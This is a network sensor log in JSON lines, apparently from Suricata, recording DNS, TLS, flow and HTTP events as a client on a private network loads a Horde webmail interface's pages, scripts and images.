{"timestamp":"2020-02-29T00:27:19.598174+0000","flow_id":947000290277582,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39733,"proto":"UDP","dns":{"type":"answer","id":41386,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:19.598174+0000","flow_id":947000290277582,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39733,"proto":"UDP","dns":{"type":"answer","id":41386,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:19.672819+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 
(X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1843}} {"timestamp":"2020-02-29T00:27:19.672819+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1843},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/showMessage","state":"CLOSED","stored":false,"size":244,"tx_id":3}} {"timestamp":"2020-02-29T00:27:19.693191+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1843},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/showMessage","state":"CLOSED","stored":false,"size":4807,"tx_id":3}} 
{"timestamp":"2020-02-29T00:27:19.695078+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1737},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":1737,"tx_id":3}} {"timestamp":"2020-02-29T00:27:19.695774+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:27:19.696292+0000","flow_id":1068792677898677,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53184,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/download.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":297}} 
{"timestamp":"2020-02-29T00:27:19.697768+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","state":"CLOSED","stored":false,"size":234,"tx_id":4}} {"timestamp":"2020-02-29T00:27:19.741338+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/print.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:27:19.741554+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":485}} 
{"timestamp":"2020-02-29T00:27:23.000176+0000","event_type":"stats","stats":{"uptime":15295,"capture":{"kernel_packets":142546,"kernel_drops":0},"decoder":{"pkts":142586,"bytes":97913480,"invalid":196,"ipv4":140985,"ipv6":10,"ethernet":142586,"raw":0,"null":0,"sll":0,"tcp":135382,"udp":5392,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7090144},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2929,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2945,"synack":2936,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1932,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2467,"failed_udp":116},"tx":{"http":5076,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2551}},"flow_mgr":{"closed_pruned":2900,"new_pruned":17,"est_pruned":2551,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":11220,"memcap_state":0,"memcap_global":0},"http":{"memuse":105176,"memcap":0}}} 
{"timestamp":"2020-02-29T00:27:23.186394+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":485},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/plus.png","state":"CLOSED","stored":false,"size":485,"tx_id":4}} {"timestamp":"2020-02-29T00:27:23.186770+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/newwin.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":316}} {"timestamp":"2020-02-29T00:27:23.188334+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/print.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/print.png","state":"CLOSED","stored":false,"size":349,"tx_id":5}} {"timestamp":"2020-02-29T00:27:23.188587+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} {"timestamp":"2020-02-29T00:27:24.178077+0000","flow_id":1770852327399578,"in_iface":"eth0","event_type":"tls","src_ip":"192.168.10.130","src_port":34308,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","tls":{"subject":"CN=mail.spiral.com","issuerdn":"CN=ChangeMe","fingerprint":"4a:cf:f5:f8:ce:55:c7:45:08:c5:21:a0:2d:b6:f5:0f:3c:e0:a3:17","sni":"mail.spiral.com","version":"TLS 1.2","notbefore":"2020-02-28T18:40:24","notafter":"2030-02-25T18:40:24"}} {"timestamp":"2020-02-29T00:27:24.701651+0000","flow_id":1068792677898677,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53184,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/download.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":297},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/download.png","state":"CLOSED","stored":false,"size":297,"tx_id":0}} {"timestamp":"2020-02-29T00:27:26.000229+0000","flow_id":1691541457050508,"event_type":"flow","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":35,"pkts_toclient":56,"bytes_toserver":8649,"bytes_toclient":66438,"start":"2020-02-29T00:26:19.957324+0000","end":"2020-02-29T00:26:25.439540+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.000477+0000","flow_id":1289824575955109,"event_type":"flow","src_ip":"192.168.10.81","src_port":53152,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:26:20.008357+0000","end":"2020-02-29T00:26:25.160374+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:27:26.000669+0000","flow_id":1460171568849225,"event_type":"flow","src_ip":"192.168.10.81","src_port":53156,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1862,"bytes_toclient":1979,"start":"2020-02-29T00:26:20.008521+0000","end":"2020-02-29T00:26:25.089944+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.000890+0000","flow_id":371298575065439,"event_type":"flow","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":30,"bytes_toserver":5040,"bytes_toclient":31417,"start":"2020-02-29T00:26:20.008543+0000","end":"2020-02-29T00:26:25.702106+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.001002+0000","flow_id":1225885397469246,"event_type":"flow","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":83,"pkts_toclient":121,"bytes_toserver":13296,"bytes_toclient":151458,"start":"2020-02-29T00:26:14.837694+0000","end":"2020-02-29T00:26:25.698980+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:27:26.001137+0000","flow_id":1673743112610025,"event_type":"flow","src_ip":"192.168.10.81","src_port":53154,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1906,"bytes_toclient":2538,"start":"2020-02-29T00:26:20.008425+0000","end":"2020-02-29T00:26:25.432430+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.800225+0000","flow_id":571491300029921,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46613,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":46428,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:26.826777+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/newwin.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":316},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/newwin.png","state":"CLOSED","stored":false,"size":316,"tx_id":5}} {"timestamp":"2020-02-29T00:27:26.908921+0000","flow_id":571491300029921,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46613,"proto":"UDP","dns":{"type":"answer","id":46428,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:27:26.908921+0000","flow_id":571491300029921,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46613,"proto":"UDP","dns":{"type":"answer","id":46428,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:26.991245+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6769}} {"timestamp":"2020-02-29T00:27:27.089615+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6769},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":23886,"tx_id":6}} 
{"timestamp":"2020-02-29T00:27:27.091932+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/message-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2622}} {"timestamp":"2020-02-29T00:27:27.094641+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/message-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2622},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/message-dimp.js","state":"CLOSED","stored":false,"size":10354,"tx_id":7}} {"timestamp":"2020-02-29T00:27:27.113034+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/js\/textarearesize.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":833}} {"timestamp":"2020-02-29T00:27:27.116099+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","state":"CLOSED","stored":false,"size":227,"tx_id":6}} {"timestamp":"2020-02-29T00:27:27.116343+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imageupload.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":867}} 
{"timestamp":"2020-02-29T00:27:27.115958+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/textarearesize.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":833},"app_proto":"http","fileinfo":{"filename":"\/js\/textarearesize.js","state":"CLOSED","stored":false,"size":2039,"tx_id":8}} {"timestamp":"2020-02-29T00:27:27.116330+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-base.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1833}} {"timestamp":"2020-02-29T00:27:27.118664+0000","flow_id":1537249056376372,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53186,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/draghandler.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":908}} {"timestamp":"2020-02-29T00:27:27.120068+0000","flow_id":1662636331616331,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53188,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/editor.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":712}} {"timestamp":"2020-02-29T00:27:27.121899+0000","flow_id":1537249056376372,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53186,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/draghandler.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":908},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/draghandler.js","state":"CLOSED","stored":false,"size":2941,"tx_id":0}} 
{"timestamp":"2020-02-29T00:27:27.121238+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imageupload.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":867},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/ckeditor\/imageupload.js","state":"CLOSED","stored":false,"size":2232,"tx_id":7}} {"timestamp":"2020-02-29T00:27:27.121786+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":10281}} 